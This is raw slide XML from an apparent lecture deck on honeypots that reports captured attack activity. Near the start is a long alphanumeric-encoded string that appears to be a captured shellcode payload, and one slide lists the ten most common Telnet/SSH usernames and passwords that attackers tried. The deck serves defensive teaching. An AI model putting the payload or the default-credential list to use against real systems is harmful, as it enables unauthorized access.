              <a:t>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JB9lk8sYkPkPypC0CY7uNQfr1TdKNrP0TKPRlLDKaBMDtKqbkxjoh70JNFP1yoP17PDlMls1QlYrnLmP7QXOlMZaI7K2hp22Nw4KqBjpBk12oLKQJ02kq03HE5WPQdOZm18PB0tKMxlXbk0XO0m1j3zCml0IrkLt2kiqxVnQYo01upvLva6ojmyqfgLxyPd5Xt9sQmHxoKqmLdSExbnxBk1Ho49qXSC6rkjlpK2kb8mLja8SDKjdDKKQ6pu90DmTNDaKqKOq1IPZr19ogpOhOo0ZtKzrXksVomqXPnc5qdm0ph1g2IPn0i2iJFR40hPLsGKvIwIoz5P1ioNwaGnw0WofRHnZofSIuWioJ5XkOpQKlqy921nqPjkSoanqrJPPr3r0Ph27ayCoev9oYEXk0OqImaFrNrBHkPp2aPtDNrNrB2r10Rb0S8hknunNoKkOZ5E96faZjp1KRHaplsipKPQygprJm4R0BJkoNvrHQenfeNTFIoiE019oogogNw27QF2HNMjfJxsKkOIEbeupqeMVNkZordu3kPM09pHkXQwyVDYpKPKPK8fLyoKOyonOpibMpa1W2Ed3NO1Qc2RCnONdpLnN0pS82PkPXkRKMay0Oo20BJm20jm2B01ZYrpjM20Wc88ZYfYJpO9o6u63MawP2FfXkTm3O9i4r4BmnlO4m8ma90vTLC2021ofc8LRV62iiRYoYEReEpqdLmNxu5EprTJvqZm0OdR0bmoTo4jl0Pb3bHLm1GFN1Kiovuu3JL9tHkXNpSc8FfRvqwnryoWeRJYpqGbHlq2kBOqwiovuaZkPBHXpee3rqFIo9EXhdPIoyo9oMsmjnOnOnrS5RC1ic3RLbE0rloloBS2VOsph2O2SsDlns51hPeIphhIbKNioKOp109OBLnmaP4mdlnP105P0nNNQoHLxkPAA&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF9A3319-684C-5242-B85D-7763C996DC22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61197F1C-43D9-0141-8DC6-148FD7815163}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83D8A449-2DFA-2541-A303-853E32CEEB37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29688250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595B1-0AFA-9446-8EAC-EDA40FF41FC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wikipedia</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E78A0B83-DA3D-B545-9AEF-A4D7531DCF0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In computer terminology, a honeypot is a computer security mechanism set to detect, deflect, or, in some manner, counteract attempts at unauthorized use of information systems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{702CD884-5649-D740-9E1E-14E8A2BFEC9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9A390DE-99E7-4547-A4F6-A26EF16D87C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D95843E5-2CB1-A647-82E2-508C0583602A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22427453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D755C3-214C-7045-B45D-F4FD68CA1064}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Top 10 Telnet/SSH Credentials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69468143-21EC-2E46-8475-C33537F01261}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>admin   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>guest   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>supervisor  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>user    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Administrator   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>telnet  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>admin1  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Admin   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>administrator   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4597ECFE-AED9-8743-A8D2-5504C1B75878}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>adminpass</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1234</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>12345</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>123456</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>666666</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>54321</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Date Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E444A75A-2632-8346-82E2-044248E57F0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE9ADE48-29EE-D241-90AC-F7EB15D6AD60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67180CE5-38DA-7344-BC5C-76868C1AC3A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28544573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4CE3BDB-0CEC-944D-BEF9-FA97DEAC130D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Total Scans</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5E6C859-2CFD-7B48-8EAC-89B15D1E6CBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB63B586-135A-B949-84FC-F49514CA2905}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11FBE7FA-B756-574A-A604-FB497E505E66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1B7E35B-7CF7-1348-93EA-47BBD52AA6C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="96635376"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="914400"/>
          <a:ext cx="73152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93304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A8892-86F1-C24D-B96B-5577676BC195}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unique IP Addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEF6F737-D3FC-5941-91F7-F0AF874C9831}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="653602192"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="914400" y="914400"/>
          <a:ext cx="73152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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6257824D-6148-CF48-8C08-CB2C0673E800}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16E9CCE9-909D-DD48-998C-F47CB0586CE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{726DEC70-3B7E-A049-B534-56CDEFA574CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11209069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 shot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF618C5A-FA46-7849-899E-0B88A8BBF210}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="23111" b="-23111"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="952307" y="1063229"/>
            <a:ext cx="7239385" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECB26D70-C724-6940-B043-95504E10D610}"/>
              </a:ext>
            </a:extLst>
